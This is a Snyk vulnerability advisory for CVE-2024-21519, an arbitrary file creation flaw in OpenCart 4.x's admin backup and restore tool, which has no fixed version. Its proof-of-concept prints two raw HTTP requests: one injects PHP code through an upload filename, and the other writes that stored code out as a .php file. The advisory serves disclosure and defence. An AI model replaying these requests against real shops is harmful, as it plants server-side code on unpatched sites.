Arbitrary File Creation Affecting opencart/opencart package, versions >=4.0.0.0
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Arbitrary File Creation vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-PHP-OPENCARTOPENCART-7266579
- published21 Jun 2024
- disclosed17 Jun 2024
- creditCalum Hutton
Introduced: 17 Jun 2024
CVE-2024-21519 (opens in a new tab)How to fix?
There is no fixed version for opencart/opencart.
Overview
opencart/opencart is a shopping cart system
Affected versions of this package are vulnerable to Arbitrary File Creation. An Arbitrary File Creation issue was identified via the database restoration functionality. By injecting PHP code into the database, an attacker with admin privileges can create a backup file with an arbitrary filename (including the extension), within /system/storage/backup.
Note:
It is less likely for the created file to be available within the web root, as part of the security recommendations for the application suggest moving the storage path outside of the web root.
PoC
All user input ($_GET, $_POST etc) is passed through htmlspecialchars at startup, so by default will be stored in the database encoded. There are some places where this isn't the case though, such as with the filename parameter of the admin tool/upload.upload route:
POST http://127.0.0.1/opencart/admin/index.php?route=tool/upload.upload&user_token=cd4d0433339a18c414c67e090c96a9f2 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------77933938835128784303963783419 Content-Length: 245 Origin: http://127.0.0.1 Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin Pragma: no-cache Cache-Control: no-cache Cookie: OCSESSID=4ae25f8f71432cba08ae148b63; currency=USD; authorize=7d90c76197634c3ac515bdf5fc3c6c7b-----------------------------77933938835128784303963783419 Content-Disposition: form-data; name="file"; filename="my_<?php phpinfo() ?>file.png" Content-Type: image/png
XXX -----------------------------77933938835128784303963783419--
html_entity_decode is used to decode the input and allows for bypass of the htmlspecialchars. This filename data is stored within the oc_upload database table.
By restoring the table and supplying the filename parameter it is possible to write the records to an arbitrary file i.e. my_script.php:
POST http://127.0.0.1/opencart/admin/index.php?route=tool/backup.backup&user_token=cd4d0433339a18c414c67e090c96a9f2&table=oc_upload&filename=my_script.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 22 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/opencart/admin/index.php?route=tool/backup&user_token=cd4d0433339a18c414c67e090c96a9f2 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Cookie: OCSESSID=4ae25f8f71432cba08ae148b63; currency=USD; authorize=7d90c76197634c3ac515bdf5fc3c6c7b
backup%5B%5D=oc_upload